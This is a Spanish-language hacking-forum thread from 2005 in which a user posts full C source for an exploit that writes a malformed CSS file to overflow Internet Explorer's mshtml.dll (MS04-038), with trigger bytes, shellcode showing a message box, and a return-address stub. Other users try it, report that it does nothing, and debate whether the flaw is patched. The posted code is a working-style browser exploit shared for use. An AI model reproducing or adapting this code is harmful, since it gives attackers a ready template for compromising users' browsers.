elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 13:22  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)  (Leído 1,041 veces)
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« en: 10 Marzo 2005, 09:34 »

En k-otik ha salido un nuevo xploit que es el siguiente

Código:
#include <stdio.h>
#include <string.h>
#include <tchar.h>

char bug[]=
"\x40\x63\x73\x73\x20\x6D\x6D\x7B\x49\x7B\x63\x6F\x6E
\x74\x65\x6E\x74\x3A\x20\x22\x22\x3B\x2F"
"\x2A\x22\x20\x22\x2A\x2F\x7D\x7D\x40\x6D\x3B\x40\x65\
x6E\x64\x3B\x20\x2F\x2A\x22\x7D\x7D\x20\x20\x20";

//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/

char shellcode[]= "\x33\xDB\x53\x53\x04\x0F\x50\x53\xE9\xCB\x8D\x6D\x74"
"\x90\x90\x48\x61\x63\x6B\x20\x69\x65\x36\x20\x63\x73\x73";


////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX

char ret[]= "\x8B\xC4\x66\x05\xAC\x01\xFF\xD0";

int main(int argc, char* argv[])
{

char buf[8192];
FILE *cssfile;
int i;

printf("\n\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
printf(" Coded by : Arabteam2000 \n");
printf(" Web: www.arabteam2000.com \n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

// NOP`s
for(i=0;i<8192;i++)
buf[i]=0x90;


// bug
memcpy((void*)&buf[0],
(void*)&bug,48);

// shellcode
memcpy((void*)&buf[100],
(void*)&shellcode,27);

// ret address
memcpy((void*)&buf[8182],
(void*)&ret,8);


cssfile=fopen("file.css","w+b");
if(cssfile==NULL){
printf("-Error: fopen \n");
return 1;
}

fwrite(buf,8192,1,cssfile);
printf("-Created file: file.css\n ..OK\n\n");

fclose (cssfile);
return 0;
}


No suelo pedir ayuda, pero ahora es que tengo una dudilla, he compilado el codigo y creo el css, pero el css no me hace nada, he creado un html, uniendolo a la hoja de estilos pero no ocurre nada. :S Que fallo hay?
En línea
buster

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #1 en: 10 Marzo 2005, 10:05 »

A mi me pasa exactamente lo mismo, compilo y todo va bien se compila sin problemas. Genero mi .ccs y al agregar la hoja de estilo no pasa nada absolutamente  :(

La hoja de estilo la agrego de la siguiente manera:
Código:
<html>
<head>
<link rel="stylesheet" type="text/css" href="file.css">
</head>
<body>
Y ahora que?
</body>
</html>

A lo mejor es que hay que agregarla de algun modo especial nose, tambien he probado de la esta otra forma y nada:

Código:
<html>
<head>
<style type="text/css">
<!--
@import url("file.css");
-->
</style>
</head>
<body>
Y ahora que?
</body>
</html>

Algo hacemos mal nose¿? enga salu2
En línea
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #2 en: 10 Marzo 2005, 10:10 »

Quizas porque es algo viejo y seguro ya tienen el IE parchado? http://www.microsoft.com/technet/security/bulletin/ms04-038.mspx

Dice que se arreglo en Noviembre 9,2004
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #3 en: 10 Marzo 2005, 10:18 »

jaJAjaja pues va a ser eso! me está por no leer todo, como vi que salia publicado hoy en k-otik supuse que era actual, y no miré ni fechas ni nada.

Gracias Crack_X ;) Sorry por el fallo
En línea
buster

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #4 en: 10 Marzo 2005, 10:21 »

Jajajaja lo mismo me ha pasado a mi que ojeando digo ostras y al verlo nuevo digo vamos a ver que tal. Puede ser que también pueda más el sueño conmigo que las ganas de hacer cosas xDDD. Gracias de todos modos.

Salu2.
En línea
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #5 en: 10 Marzo 2005, 21:03 »

Pues al final si es actual Crack_X
En vsantivirus han publicado una noticia sobre el xploit, y el bug, y dicen que es actual, la noticia salida a dia de hoy (10/03/05) pone:

Citar
Software afectado:

Son vulnerables los siguientes productos:

- Microsoft Internet Explorer 6.0 SP2
- Microsoft Internet Explorer 6.0 SP1
- Microsoft Internet Explorer 6.0 (2000, 98, ME, NT, 2003, XP)


Solución:

Al momento actual, Microsoft no ha publicado ningún parche o actualización para esta vulnerabilidad.

Algo no me cuadra entonces porque sale eso de M04-038 y en vsantivirus pone que no ha salido solución :S
« Última modificación: 10 Marzo 2005, 21:06 por xXx.wormz » En línea
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #6 en: 11 Marzo 2005, 03:50 »

Pues no se pero segun la web de microsoft el MS04-038 fue parchado el ultimo año y puedes ver eso en la web que te puse.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
« Respuesta #7 en: 11 Marzo 2005, 08:36 »

Si si ya vi ademas el nombre del xploit ya trae la referencia a la actualización :S por eso no entiendo, pero mira en vsantivirus.... Supongo que se han confundido o no han confirmado la información
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines